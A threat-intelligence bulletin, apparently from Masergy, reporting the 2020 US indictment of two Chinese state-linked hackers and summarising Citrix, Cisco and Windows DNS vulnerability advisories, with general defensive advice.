Chinese State-sponsored hackers indicted

Published on July 28th, 2020

In the Spotlight: Chinese State-sponsored hackers

Key Topics Covered

Executive Summary

Hackers operating under the Ministry of State Security in China have been indicted by the US government for stealing terabytes of data from government organizations and companies around the world.

What happened?

Two Chinese nationals, LI Xiaoyu and DONG Jiazhi, were accused of having been a part of an over 10 year long hacking campaign. The hackers attacked companies and government organizations in the United States, Australia, Belgium, Germany, Japan, Lithuania, the Netherlands, Spain, South Korea, Sweden, and the United Kingdom in several sectors like high tech manufacturing (medical device, civil, and industrial engineering), business, educational, and gaming software. Both would revisit previously hacked organizations, with at least one instance of the attackers attempting to extort cryptocurrency from their victim. Their most recent activity saw them probing for vulnerabilities in computer networks of companies developing COVID-19 vaccines, testing technology and treatments. Both were charged with conspiracy to commit computer fraud, conspiracy to commit theft of trade secrets, conspiracy to commit wire fraud, and seven counts of aggravated identity theft.

Hacker indictments – So what?

The hackers gained access to their victim’s network by exploiting publicly known software vulnerabilities in popular web server software, web application development suites and software collaboration programs. They also targeted insecure default configurations in common applications. The attackers used their initial unauthorized access to place malicious web shell programs like China Chopper and credential-stealing software on victim networks, allowing them to execute remote commands. These two attackers not only compromised networks for their own profit, they also stole information of interest to the PRC Government’s Ministry of State Security the attackers worked for.

Hacker indictments – What do I do?

It’s important to utilize a defense-in-depth approach for securing your network to better help you and your team’s chances of catching malicious activity on your network. If one technology such as antivirus misses the compromise, then having analytics that look at network behavior and endpoints can help your team spot strange activity on your network much faster. It is also a good idea to have your team compare how your network’s defense compares against the MITRE ATT&CK® model. As shown with these two hackers, many attackers will revisit their previous victims – and by being aware of where your weaknesses are in detection, you can greatly reduce the risk of re-compromisation by bolstering those areas.

Highlights in Brief

Citrix Bugs allow unauthenticated code injection, Data theft

Citrix has released an advisory containing a list of vulnerabilities found in the Citrix Application Delivery Controller (ADC) and Gateway that could allow code injection, information disclosure, and denial of service attacks. Four of the vulnerabilities can be exploited by an unauthenticated remote threat actor. Citrix has noted that they have not seen any active exploitation of the bugs but nonetheless have advised their customers to install the latest patches to fully resolve all of the issues. They also noted that the listed vulnerabilities are not related to the critical bug CVE-2019-19781 in Citrix ADC and Gateway which could allow an unauthenticated attacker to execute arbitrary code via directory traversal due to improper handling of pathnames.

Cisco releases security fixes for critical VPN, router vulnerabilities

Cisco released fixes on several vulnerabilities found in some of their products, five of which are given critical CVSS scores. The critical vulnerabilities all have a 9.8 severity score and affect different Cisco product offerings. Moreover, three of them affect Cisco’s small business VPN firewalls and routers that, if exploited successfully, could allow attackers to execute arbitrary code as a root user. The other two bugs on the other hand, CVE-2020-3144 and CVE-2020-3140, affect Cisco’s web management portal and the Cisco Prime License Manager (PLM) respectively and if exploited successfully, could allow attackers to bypass authentication or escalate privileges in order to compromise the system. Cisco has advised all of their customers to apply the patch immediately either by accepting automatic updates or manually installing them.

CISA issues emergency vulnerability warning

The US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency advisory advising all government agencies to fix a critical vulnerability in Windows Server within 24 hours. This comes after Microsoft’s Patch Tuesday this month fixed a 17-year old bug with a CVSS severity score of 10.0. Tracked as CVE-2020-1350, the vulnerability affects the Microsoft Windows DNS, the domain name system service found in Windows Server operating systems. Attackers can craft malicious DNS queries to the vulnerable server which allows them to execute arbitrary code that can then lead to compromising the entire infrastructure. According to Microsoft’s advisory, affected versions are Windows Server 2003 to 2019. A workaround solution is also available that should be applied as soon as possible.

Forward look


Appendix A

Language of uncertainty

Throughout this intelligence summary Masergy assessed probability using qualitative statements from the following defined matrix. To give the reader perspective, each statement is bounded by a probability range.

Source evaluation

Masergy evaluated sources using the two matrices defined below, scoring the reliability of source and that of the information gleaned from them.